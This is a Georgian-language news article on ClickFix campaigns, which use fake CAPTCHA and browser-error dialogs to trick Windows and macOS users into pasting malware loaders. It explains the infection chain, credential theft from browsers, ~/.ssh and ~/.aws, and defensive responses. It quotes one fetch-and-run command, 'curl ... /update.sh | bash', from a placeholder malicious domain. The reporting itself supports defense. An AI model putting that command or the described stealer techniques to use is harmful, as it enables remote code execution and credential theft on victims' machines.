# ClickFix სოციალური ინჟინერიის შეტევები ვირუსული ტალღების მოტყუებით მომხმარებლებს Windows-სა და macOS-ზე მავნე PowerShell-ის გაშვებაში

Source: TechNewsList (https://technewslist.com)
Canonical URL: https://technewslist.com/ka/article/clickfix-social-engineering-powershell-malware-windows-macos-2026-09-11-night-ka
Section: Software (https://technewslist.com/ka/software)
Author: TechNewsList
Language: ka
Published: 2026-09-11T18:42:48.367+00:00
Updated: 2026-09-11T18:42:48.778048+00:00

> კიბერუსაფრთხოების მკვლევარებმა აღმოაჩინეს ClickFix სოციალური საინჟინრო კამპანიების ვირუსული ტალღა, რომელიც ახორციელებს ყალბ ბრაუზერის დიალოგებს, რათა მოატყუონ მომხმარებლები Windows-სა და macOS-ზე მავნე სკრიპტების გაშვებაში.

## TL;DR
- დახვეწილი სოციალური საინჟინრო კამპანია, რომელიც ცნობილია როგორც ClickFix, გაიზარდა ათასობით კომპრომეტირებულ საწარმოსა და სამომხმარებლო ვებსაიტზე.
- თავდასხმა ატყუებს მსხვერპლს, დააკოპირონ ყალბი ბრაუზერის შეცდომის გამოსწორების ბრძანებები და ჩასვან ისინი სისტემის ტერმინალში.
- საფრთხის მონაწილეებმა გააფართოვეს დატვირთვა Windows PowerShell-ის მიღმა, რათა შეიცავდნენ მრავალსაფეხურიან AppleScript და Bash ჩამტვირთველებს macOS-ისთვის.
- იმის გამო, რომ ბრძანებები ხელით შესრულებულია ავტორიზებული მომხმარებლების მიერ, ტექნიკა გვერდს უვლის ბრაუზერის ქვიშის ყუთებს და ჩამოტვირთვის ავტომატურ ფილტრებს.

## Key points
- კატეგორია: კიბერუსაფრთხოების გამოძიება და საბოლოო წერტილის დაცვა.
- ძირითადი საფრთხეები: ClickFix კამპანია, PowerShell პასტის ჯეკინგი, macOS ტერმინალის ინექცია.
- ინფექციის მექანიზმი: მატყუარა ვებ-აპარტაჟი Cloudflare Turnstile-ის მიბაძვით, Google Chrome-ის განახლებები და ვიდეო კოდეკის დადასტურებები.
- ოპერაციული სისტემის წვდომა: უნივერსალური ჯვარედინი პლატფორმა, რომელიც მოიცავს Windows 11, Windows 10 და macOS Sonoma/Sequoia.
- მეორადი დატვირთვები: Vidar, Lumma Stealer, Rhadamanthys და Cobalt Strike შუქურის იმპლანტები.
- შემარბილებელი რეკომენდაციები: შეზღუდეთ სკრიპტის თარჯიმანის ქვირითობა, განახორციელეთ Attack Surface Reduction-ის წესები და აუდიტის ბუფერში API-ები.

# ClickFix სოციალური ინჟინერიის შეტევები ვირუსული ტალღების მოტყუებით მომხმარებლებს Windows-სა და macOS-ზე მავნე PowerShell-ის გაშვებაში

## რა მოხდა
2026 წლის 11 სექტემბერს, საფრთხის დაზვერვის მკვლევარებმა კიბერუსაფრთხოების მრავალ ფირმაში გამოაქვეყნეს კოორდინირებული რჩევები, სადაც დეტალურად იყო აღწერილი "ClickFix" სოციალური საინჟინრო შეტევის ვექტორის მასიური ვირუსული აჩქარება. კამპანია, რომელიც კომპრომისს აყენებს ლეგიტიმურ ვებ სერვერებს და ავრცელებს მატყუარა მოთხოვნებს ათასობით ვებსაიტზე, მანიპულირებს ვიზიტორებს ხელით დააკოპირონ და შეასრულონ ძლიერ ბუნდოვანი მავნე პროგრამის ჩამტვირთავი ბრძანებები პირდაპირ სისტემის ტერმინალებში. მიუხედავად იმისა, რომ ადრინდელი გამეორებები ფოკუსირებული იყო ექსკლუზიურად Windows-ის მომხმარებლების მოტყუებაზე PowerShell ბრძანებების გაშვებაში, უახლესი ტალღა შემოაქვს კროს-პლატფორმის შესაძლებლობებს, რომლებიც მორგებულია MacOS სამუშაო სადგურების დასაინფიცირებლად AppleScript-ისა და Bash-ის საშუალებით.

მოტყუება ეყრდნობა ჰიპერ-რეალისტურ ყალბი შეცდომის დიალოგებს, რომლებიც მასკარირებულია როგორც ბრაუზერის რუტინული გადამოწმების მოთხოვნა. როდესაც მომხმარებელი ეშვება გატეხილ ვებ გვერდზე, საიტი აჩვენებს მოდალურ გადაფარვას, რომელიც მიბაძავს წარუმატებელ Cloudflare CAPTCHA დადასტურებას, ვადაგასული Google Chrome-ის უსაფრთხოების სერტიფიკატს ან დაკარგული ვიდეოს დეკომპრესიის კოდეკს. მოთხოვნა აცნობებს მომხმარებელს, რომ ხელმისაწვდომია ავტომატური ტექნიკური შეკეთება და ავალებს მათ დააწკაპუნონ ღილაკზე, სახელწოდებით „Copy Fix Code“, გახსნას სისტემის გაშვების დიალოგი (Windows Key + R ან macOS Spotlight) და ჩასვას ბუფერში შიგთავსი ტერმინალში.

იმის გამო, რომ მსხვერპლი ნებით აკოპირებს სკრიპტს და ახორციელებს მას საკუთარი მომხმარებლის პრივილეგიებით, თავდასხმის ვექტორი მთლიანად გვერდს უვლის ბრაუზერის ჩამოტვირთვის ტრადიციულ დაცვას, ვებ რეპუტაციის ფილტრებს და შესრულებადი დაბლოკვის კონტროლს. უსაფრთხოების ოპერაციების ცენტრების მიერ გამოქვეყნებული ტელემეტრია მიუთითებს, რომ ათიათასობით კორპორატიული და პირადი სამუშაო სადგური დაზიანდა ბოლო კვირების განმავლობაში, რაც აწვდის დესტრუქციულ მეორად დატვირთვას, მათ შორის Lumma Stealer, Vidar, Rhadamanthys და ფარული ბრძანება და კონტროლის შუქურის იმპლანტები.

## რატომ არის მნიშვნელოვანი
ClickFix კამპანიის ვირუსული წარმატება ხაზს უსვამს კიბერ საფრთხის ლანდშაფტის მიმდინარე, ფუნდამენტურ ევოლუციას. გასული რამდენიმე წლის განმავლობაში, ბრაუზერის დეველოპერებმა და ოპერაციული სისტემების მომწოდებლებმა შექმნეს შესანიშნავი ავტომატური დაცვა, როგორიცაა Mark-of-the-Web (MotW) ინსპექტირება, SmartScreen-ის რეპუტაციის შეფასება და ბრაუზერის ჩამოტვირთვის sandboxing, რამაც თითქმის შეუძლებელი გახადა ტრადიციული "ჩამოტვირთვის" შეტევების განხორციელება ძვირადღირებული ნულოვანი დღის ექსპლოიტების გარეშე. ამის საპასუხოდ, კიბერკრიმინალმა სინდიკატებმა გადაიტანეს ყურადღება მომხმარებლის საკუთარი ადმინისტრაციული უფლებამოსილების შეიარაღებაზე დახვეწილი ქცევითი მანიპულაციის გზით.

მსხვერპლის მიტანის მანქანაში გადაქცევით, თავდამსხმელები არღვევენ მილიონობით დოლარს თავდაცვითი უსაფრთხოების კონტროლში. საწარმოს პერიმეტრის ბუხარი ვერასოდეს ხედავს შემომავალი ორობითი ფაილის ჩამოტვირთვას, რადგან სკრიპტი მიიღება უშუალოდ კონტენტის მიწოდების სანდო ქსელებიდან (CDN) ან დაშიფრულია პირდაპირ ლეგიტიმურ ვებ API-ებში. გარდა ამისა, იმის გამო, რომ მომხმარებლები ვალდებულნი არიან დაიცვან ტექნიკური შეცდომების ინსტრუქციები ვებ-გვერდების დათვალიერებისას, ClickFix აღწევს კონვერტაციისა და ინფექციის მაჩვენებლებს მნიშვნელოვნად უფრო მაღალი, ვიდრე ტრადიციული ელ.ფოსტის ფიშინგ კამპანიები.

macOS-ის სპეციფიკური ინფექციის ჯაჭვების სწრაფი გაჩენა აღნიშნავს შემაშფოთებელ ესკალაციას საწარმოთა IT გარემოში. ისტორიულად, macOS სამუშაო სადგურები კორპორატიულ გარემოში ითვლებოდა ნაკლებად დაუცველად ჩვეულებრივი ვებ მავნე პროგრამების მიმართ Apple-ის Gatekeeper-ის და კოდის ხელმოწერის ნოტარიულად დამოწმების მოთხოვნების გამო. თუმცა, ClickFix მთლიანად გვერდს უვლის Gatekeeper-ს: როდესაც თანამშრომელი ახორციელებს Bash ან AppleScript სტრიქონს ტერმინალში, Gatekeeper არ ერევა, რაც საშუალებას აძლევს ინფოქურდებს შეუფერხებლად ამოიღონ ბრაუზერის სესიის ქუქიები, keychain რწმუნებათა სიგელები და Cloud API ტოკენები დეველოპერული მანქანებიდან.

## ტექნიკური დეტალები
ClickFix ინფექციის ჯაჭვი იწყება გატეხილი WordPress საიტებით, გატაცებული ვებ სარეკლამო ქსელებით ან მავნე საძიებო სისტემის ოპტიმიზაციის (SEO) გადამისამართების კვანძებით. როდესაც მსხვერპლი ამოძრავებს ყალბი შეცდომის მოთხოვნას და დააწკაპუნებს ღილაკზე "Copy Code", ვებ გვერდი იყენებს ბრაუზერის Document Object Model (DOM) Clipboard API-ს, რათა გადაწეროს მომხმარებლის ბუფერული ბუფერი ძლიერ ბუნდოვანი ბრძანების სტრიქონით, ხოლო ეკრანზე უვნებელი დიაგნოსტიკური ტექსტის ჩვენება.

![საწარმოს უსაფრთხოების ოპერაციების ცენტრი აკონტროლებს არანორმალურ PowerShell პროცესის შესრულების ხეებს](https://rkhynbcsbnkkcwgexzwg.supabase.co/storage/v1/object/public/media/api/1789147167575-xx8ygn-clickfix-social-engineering-powershell-malware-windows-macos-2026-09-11-night-inside-1-2bc3f2184d.webp)
*საწარმოს უსაფრთხოების ოპერაციების ცენტრი აკონტროლებს PowerShell პროცესის არანორმალურ ხეებს და ბუფერში API ანომალიებს.*

Windows სისტემებზე კოპირებული სტრიქონი, როგორც წესი, მიზნად ისახავს "powershell.exe" ან "cmd.exe" გაშვებულ Windows Run დიალოგში ("Win + R"). დატვირთვა იყენებს base64-ში დაშიფრულ სტრიქონებს და ცვლად დაბნელებას, რათა გამორთოს ანტიმავნე პროგრამების სკანირების ინტერფეისი (AMSI) მეხსიერებაში, სანამ დამყარდება გამავალი HTTPS კავშირი თავდამსხმელის მიერ კონტროლირებად ბრძანება და კონტროლი სერვერთან. სკრიპტი ახორციელებს მეხსიერების ამრეკლავ DLL ჩამტვირთველს, ინექციას infostealer ბინარებს პირდაპირ Windows-ის ლეგიტიმურ ჰოსტის პროცესებში, როგორიცაა 'svchost.exe' ან 'explorer.exe', რათა თავიდან აიცილოს სასამართლო ექსპერტიზის არტეფაქტების დისკზე ჩაწერა.

macOS სისტემებზე თავდასხმა აჩვენებს მორგებულ ინსტრუქციებს, რომლებიც ავალებს მომხმარებელს გახსნას ტერმინალი Spotlight-ის საშუალებით და ჩასვას სტრიქონი, ფორმატირებული, როგორც 'curl -sL https://[malicious-domain]/update.sh | ბაშ'. Shell სკრიპტი ახორციელებს მეორად Python ან AppleScript wrapper-ს, რომელიც ჩამოთვლის დაინსტალირებულ ვებ ბრაუზერებს, ამოიღებს გაშიფრულ ქუქიების მონაცემთა ბაზებს, ათავსებს SSH კლავიშებს და მიზნად ისახავს მგრძნობიარე კონფიგურაციის ფაილებს, რომლებიც მდებარეობს '~/.aws' და '~/.ssh'-ში. მოპარული რწმუნებათა სიგელები შეკუმშულია დაშიფრულ არქივში და ექსფილტრირებულია დაშიფრული Telegram Bot API ვებ-კაუქებით ან დეცენტრალიზებული IPFS კარიბჭით.

![მასპინძლის ბოლო წერტილის ინტერფეისის ანალიზი, რომელიც აჩვენებს მატყუარა მოდალურ დიალოგებს](https://rkhynbcsbnkkcwgexzwg.supabase.co/storage/v1/object/public/media/api/1789147169494-vmy3z5-clickfix-social-engineering-powershell-malware-windows-macos-2026-09-11-night-inside-2-2aecad3cc4.webp)
*მასპინძლის ბოლო წერტილის ინტერფეისის ანალიზი, რომელიც გვიჩვენებს, თუ როგორ მანიპულირებს მატყუარა მოდალური დიალოგები მომხმარებლის სამუშაო პროცესებით ადმინისტრაციული სკრიპტების შესასრულებლად.*

## გავლენა ბაზარზე და ინდუსტრიაზე
ClickFix შეტევების ზრდამ გამოიწვია გადაუდებელი თავდაცვითი რეაგირება საწარმოს უსაფრთხოების გუნდებსა და პროგრამული უზრუნველყოფის მომწოდებლებში. Endpoint Detection and Response (EDR) პროვაიდერები, მათ შორის Microsoft Defender, CrowdStrike და SentinelOne, სწრაფად არეგულირებენ ქცევის აღმოჩენის წესებს, რათა ამოიცნონ პროცესის შექმნის ანომალიური შაბლონები, კონკრეტულად აკვირდებიან შემთხვევებს, სადაც 'powershell.exe', 'cmd.exe' ან 'bash' წარმოიქმნება დიალოგური ბრძანებების პირდაპირ Runcod-ის არგუმენტით.

საწარმოთა უსაფრთხოების ოპერაციების ცენტრები ასევე არეგულირებენ თავდასხმის ზედაპირის შემცირების (ASR) პოლიტიკას. უსაფრთხოების ადმინისტრატორები ახორციელებენ პოლიტიკას, რომელიც ბლოკავს სკრიპტის თარჯიმნების მიერ გენერირებულ ბავშვთა პროცესებს და ზღუდავს მომხმარებლის სტანდარტულ ანგარიშებს შეუზღუდავი PowerShell ბრძანებების შესრულებაში. უსაფრთხოების მკაცრი პოზების მქონე ორგანიზაციებში, IT დეპარტამენტები ამუშავებენ საბოლოო წერტილის კონტროლს, რომელიც აკონტროლებს და ზღუდავს ვებ გვერდებს ბუფერების ბუფერების ჩუმად მანიპულირებას მომხმარებლის აშკარა თანხმობის გარეშე.

პლატფორმის დონეზე, კამპანია ზეწოლას ახდენს ბრაუზერის მომწოდებლებზე, როგორიცაა Google, Apple და Mozilla, რათა ხელახლა შეაფასონ DOM Clipboard API ნებართვები. მიუხედავად იმისა, რომ ტექსტის გაცვლის ბუფერში ერთი დაწკაპუნებით კოპირების შესაძლებლობა არის სტანდარტული ვებ ფუნქცია, რომელსაც იყენებენ დეველოპერის ხელსაწყოები და კოდის დოკუმენტაციის საიტები, კიბერუსაფრთხოების ანალიტიკოსები ამტკიცებენ, რომ ბრაუზერებმა უნდა შემოიღონ ვიზუალური დადასტურების გაფრთხილებები, როდესაც ვებ გვერდი წერს შესრულებადი ტერმინალის სინტაქსს სისტემის ბუფერში.

## რას უნდა დავაკვირდეთ შემდეგ
უახლოეს პერსპექტივაში, უსაფრთხოების ანალიტიკოსები მონიტორინგს გაუწევენ, თუ როგორ არეგულირებენ საფრთხის აქტორები თავიანთ სოციალურ საინჟინრო ხიბლს, რადგან გავრცელდება საზოგადოების ცნობიერება ყალბი CAPTCHA და ბრაუზერის შეცდომის შესახებ. თავდამსხმელები უკვე ატარებენ ექსპერიმენტებს კორპორატიული Single Sign-On (SSO) ხელახალი ავტორიზაციის ეკრანების, VPN კლიენტის პრობლემების მოგვარების დიალოგების და ვიდეო კონფერენციის აუდიო დრაივერის განახლებების იმიტაციით.

ორგანიზაციებმა ასევე უნდა მოელოდნენ უსაფრთხოების ოფიციალურ განახლებებს ოპერაციული სისტემის გამყიდველებისგან. Microsoft აფასებს დამატებით შეზღუდვებს სკრიპტის შესრულებაზე, რომელიც დაწყებულია Windows Run მოწოდების მეშვეობით, ხოლო Apple ამოწმებს გაუმჯობესებულ ტერმინალის ტელემეტრიის დროშებს macOS-ში, რათა გააფრთხილოს მომხმარებლები ვებ ბრაუზერებიდან დაკოპირებული ჭურვის ბრძანებების შესრულებისას.

და ბოლოს, საწარმოს რისკის მართვის გუნდებმა პრიორიტეტი უნდა მიანიჭონ მომხმარებლის ინფორმირებულობის ტრენინგს. კორპორატიული ფიშინგის სავარჯიშოებში პასტის დაჭერის და ტერმინალის შესრულების სცენარების სიმულაცია არსებითი იქნება, რათა თანამშრომლებმა გააცნობიერონ, რომ ლეგიტიმური საწარმოს ვებსაიტები და ღრუბლოვანი სერვისები არასოდეს დაავალებენ მომხმარებლებს ხელით შეასრულონ ტერმინალის სკრიპტები ვებ-ბრაუზერის შეცდომების მოსაგვარებლად.

## წყაროები
* [Ars Technica Security Lab] (https://arstechnica.com/security/2026/09/clickfix-attacks-infecting-pcs-and-macs-are-going-viral/) - ClickFix paste-jacking სოციალური საინჟინრო კამპანიისა და კროს-პლატფორმული ინფექციის ტექნიკის ყოვლისმომცველი ანალიზი.
* [BleepingComputer Cybersecurity](https://www.bleepingcomputer.com/news/security/clickfix-social-engineering-tricks-users-into-running-powershell-malware/) - ბრაუზერის გაყალბებული გადამოწმების გადაფარვების და მეორადი ინფორმაციის მოპარვის მექანიზმების გაყალბებული გადამოწმების მექანიზმის ავარია.
* [Microsoft Security Threat Intelligence](https://www.microsoft.com/security/blog/2026/09/11/analyzing-clipboard-injection-tactics-in-clickfix-campaigns/) - საფრთხის შესახებ სადაზვერვო კონსულტაცია, რომელიც უზრუნველყოფს კომპრომისის ტექნიკურ ინდიკატორებს, AMSI თავდაცვის პოლიტიკის გვერდის ავლით.

Mentions: ClickFix კამპანია, PowerShell Exploit, ბოლო წერტილის უსაფრთხოება, ფანჯრები, macOS, ლუმა ქურდული, Microsoft Defender

## Sources
- [Ars Technica უსაფრთხოების ლაბორატორია](https://arstechnica.com/security/2026/09/clickfix-attacks-infecting-pcs-and-macs-are-going-viral/)
- [BleepingComputer კიბერუსაფრთხოება](https://www.bleepingcomputer.com/news/security/clickfix-social-engineering-tricks-users-into-running-powershell-malware/)
- [Microsoft-ის უსაფრთხოების საფრთხის დაზვერვა](https://www.microsoft.com/security/blog/2026/09/11/analyzing-clipboard-injection-tactics-in-clickfix-campaigns/)